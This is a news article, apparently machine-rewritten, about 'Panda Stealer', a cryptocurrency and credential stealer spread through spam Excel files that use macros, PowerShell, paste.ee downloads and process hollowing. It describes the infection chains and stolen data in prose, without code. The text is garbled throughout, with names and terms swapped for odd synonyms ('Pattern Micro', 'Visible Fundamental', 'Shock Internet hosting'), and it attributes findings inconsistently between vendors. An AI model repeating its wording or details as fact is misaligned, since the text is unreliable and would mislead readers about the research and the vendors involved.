‘Panda Stealer’ Targets Cryptocurrency Wallets

Researchers at Trend Micro have uncovered a brand new cryptocurrency stealer variant that makes use of a fileless method in its world spam e-mail distribution marketing campaign to evade detection.

See Additionally: Live Webinar | Software Security: Prescriptive vs. Descriptive

The gang behind the malware, dubbed “Panda Stealer,” begins with emails that seem like enterprise quote requests to entice recipients to open malicious Excel information, Pattern Micro says.

Researchers discovered that the malware, a modification of Collector Stealer, has focused victims in the US, Australia, Japan and Germany.

An infection Chains

Pattern Micro recognized two an infection chains. One makes use of an .XLSM attachment that accommodates macros that obtain a loader, which then downloads and executes the principle stealer.

The second an infection chain technique entails an connected .XLS file containing an Excel components that makes use of a PowerShell command to entry paste.ee, a Pastebin different, which accesses a second encrypted PowerShell command.

“Decoding these PowerShell scripts revealed that they’re used to entry paste.ee URLs for straightforward implementation of fileless payloads. The CallByName export operate in Visible Fundamental is used to name the loading of a .NET meeting inside reminiscence from a paste.ee URL. The loaded meeting, obfuscated with an Agile.NET obfuscator, hollows a reliable MSBuild.exe course of and replaces it with its payload: the hex-encoded Panda Stealer binary from one other paste.ee URL,” based on the Pattern Micro researchers.

Stealing Data

As soon as it is put in on a tool, Panda Stealer can accumulate non-public keys and information of previous transactions from sufferer’s digital foreign money wallets, together with Sprint, Bytecoin, Litecoin and Ethereum.

“Not solely does it goal cryptocurrency wallets, it could steal credentials from different purposes, reminiscent of NordVPN, Telegram, Discord chat app and Steam,” the researchers observe. “It’s additionally able to taking screenshots of the contaminated laptop and exfiltrating knowledge from browsers, like cookies, passwords and playing cards.”

After stealing info, the malware shops stolen information in a %TEMP% folder below random file names. The information are then despatched to a command-and-control server. Additional evaluation of the C2 revealed a login web page for “Panda Stealer,” Verify Level studies.

“However extra domains have been recognized with the identical login web page,” the researchers say. “One other 14 victims have been found from the logs of certainly one of these servers. One other 264 information just like Panda Stealer have been discovered on VirusTotal. Greater than 140 C2 servers and over 10 obtain websites have been utilized by these samples.”

A number of the obtain websites have been from Discord, researchers say. They report that these include information with names reminiscent of “construct.exe.” indicating that risk actors could also be utilizing Discord to share the Panda Stealer construct.

Pattern Micro researchers recognized an IP tackle that the attackers apparently used.

“We imagine that this tackle is assigned to a digital non-public server rented from Shock Internet hosting, which the actor contaminated for testing functions,” the researchers observe. “The VPS could also be paid for utilizing cryptocurrency to keep away from being traced and makes use of the net service Cassandra Crypter. We now have reported this to Shock Internet hosting, and so they confirmed that the server assigned to this IP tackle has been suspended.”

Researchers additionally found an contaminated gadget with a historical past of visiting a Google Drive hyperlink, which can also be talked about in a dialogue about AZORult log extractor on an underground discussion board.

“The identical hyperlink and distinctive cookie have been noticed on each the log dumps and the discussion board, subsequently the consumer who posted on the discussion board should even have entry to that log file,” the researchers observe.

A Variant of Collector Stealer

Pattern Micro says that Panda Stealer is a variant of Collector Stealer, which is offered on some underground boards and a Telegram channel. Collector Stealer has been cracked by a Russian risk actor known as NCP, also referred to as su1c1de, the researchers say.

“Evaluating the compiled executables of the cracked Collector Stealer and Panda Stealer reveals that the 2 behave equally, however have completely different C2 URLs, construct tags, and execution folders,” Pattern Micro studies. “Like Panda Stealer, Collector Stealer exfiltrates info reminiscent of cookies, login knowledge, and net knowledge from a compromised laptop, storing them in an SQLite3 database. It additionally covers its tracks by deleting its stolen information and exercise logs after its execution.”

A Collector Stealer builder is overtly accessible on-line, and it may be used to create a personalized model, the researchers say.

“Risk actors might also increase their malware campaigns with particular options from Collector Stealer. We now have additionally found that Panda Stealer has an an infection chain that makes use of the identical fileless distribution technique because the “Honest” variant of Phobos ransomware to hold out memory-based assaults, making it tougher for safety instruments to identify,” the researchers observe.